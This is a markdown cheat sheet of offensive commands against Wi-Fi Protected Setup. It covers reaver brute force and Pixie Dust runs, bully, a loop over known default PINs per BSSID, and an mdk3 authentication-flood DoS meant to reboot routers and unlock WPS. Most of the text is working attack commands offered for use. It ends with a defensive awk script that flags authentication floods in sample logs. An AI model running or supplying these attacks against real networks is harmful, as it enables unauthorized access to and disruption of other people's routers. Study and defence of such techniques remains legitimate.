
# WPS

### Reaver:

```bash
# Brute-force the WPS PIN online, similar to what hydra does for logins (-vvv for more verbosity; --no-associate if we have already associated with aireplay-ng --fakeauth)
reaver -b <AP bssid> -i wlan0mon -v
reaver --bssid <AP bssid> --channel <AP channel> --interface wlan0mon -vvv --no-associate

# Pixie attack (-K): faster than the regular brute force, but it doesn't always work; it depends on the AP's PRNG
reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f
# OR
reaver -b <AP BSSID> -i wlan0mon -v -A --no-nacks # speed up guessing with -d 0 (no delay between attempts) or --dh-small (small DH keys)

# With --no-associate / -A, reaver just waits if we are not associated with the AP. Associate with aireplay-ng so the AP doesn't ignore the packets we send later (instead of 0, give the reassociation interval in seconds)
sudo aireplay-ng --fakeauth 120 -a <AP bssid> wlan0mon
```

### Bully:

```bash
bully -d wlan0mon -b F0:7D:68:44:61:EA -B -c 6
```

### AP lookup:

```bash
# Some APs use a default PIN that is linked to the first three bytes of the BSSID. Airgeddon lists them in known_pins.db
# To check whether a BSSID has known default PINs, use its first three bytes without the colons (XXYYZZ for BSSID XX:YY:ZZ:AA:BB:CC)

source /usr/share/airgeddon/known_pins.db
# An entry can hold several space-separated PINs, so write them one per line
echo ${PINDB["XXYYZZ"]} | tr ' ' '\n' > pins.txt
while read -r pin; do reaver -b F0:7D:68:44:61:EA -i wlan0mon -v -c 6 --no-nacks -p "$pin"; done < pins.txt
```

### DoS Router to restart/unlock WPS:

```bash
# DoS against an AP from many different MACs, as if it were a DDoS. Some routers reboot when too many different MACs try to connect because they cannot handle that many connections
# Show the help for mdk3's "a" mode (the one used for this DoS)
mdk3 --help a

# DoS (-m uses real-looking MACs instead of arbitrary ones like 00:00:00:00:00:00)
mdk3 wlan0mon a -a <AP BSSID> -m
```
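Seen from the AP side, the flood above shows up as many distinct client MACs authenticating to one BSSID within a few seconds. The following detection sketch is an added example, not part of the original notes; the log format, the function names, the sample addresses and the thresholds are all assumptions made for the illustration.

```bash
#!/bin/sh
# Added example: flag an authentication flood, i.e. many distinct client MACs
# hitting one BSSID inside a short window.
# The log format is constructed for this example, not a real tool's output:
#   <epoch seconds> AUTH <client MAC> <AP BSSID>

# Constructed sample: six distinct clients (one of them retrying) hit
# AA:BB:CC:00:00:01 within five seconds, while 11:22:33:00:00:02 sees
# two ordinary clients a minute apart.
sample_log() {
cat <<'EOF'
1700000000 AUTH 02:00:00:10:00:01 AA:BB:CC:00:00:01
1700000001 AUTH 02:00:00:10:00:02 AA:BB:CC:00:00:01
1700000001 AUTH 02:00:00:20:00:01 11:22:33:00:00:02
1700000002 AUTH 02:00:00:10:00:03 AA:BB:CC:00:00:01
1700000002 AUTH 02:00:00:10:00:01 AA:BB:CC:00:00:01
1700000003 AUTH 02:00:00:10:00:04 AA:BB:CC:00:00:01
1700000004 AUTH 02:00:00:10:00:05 AA:BB:CC:00:00:01
1700000004 AUTH 02:00:00:10:00:06 AA:BB:CC:00:00:01
1700000061 AUTH 02:00:00:20:00:02 11:22:33:00:00:02
EOF
}

# detect_auth_flood WINDOW_SECONDS MAX_DISTINCT_CLIENTS
# Reads log lines on stdin and prints "<bssid> <window start> <distinct clients>"
# for every fixed window whose distinct-client count exceeds the limit.
# Fixed windows are a simplification: a burst that straddles a window
# boundary is split in two, so keep the limit conservative.
detect_auth_flood() {
    awk -v win="$1" -v max="$2" '
        $2 == "AUTH" {
            bssid = toupper($4); mac = toupper($3)
            slot = int($1 / win) * win        # start of the fixed window
            key = bssid " " slot
            if (!((key, mac) in seen)) {      # count each client once per window
                seen[key, mac] = 1
                count[key]++
            }
        }
        END {
            for (key in count)
                if (count[key] > max)
                    print key, count[key]
        }' | sort
}

sample_log | detect_auth_flood 10 5
```

An alert on this pattern is also a reason to check whether the AP rebooted afterwards and whether WPS came back up unlocked.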

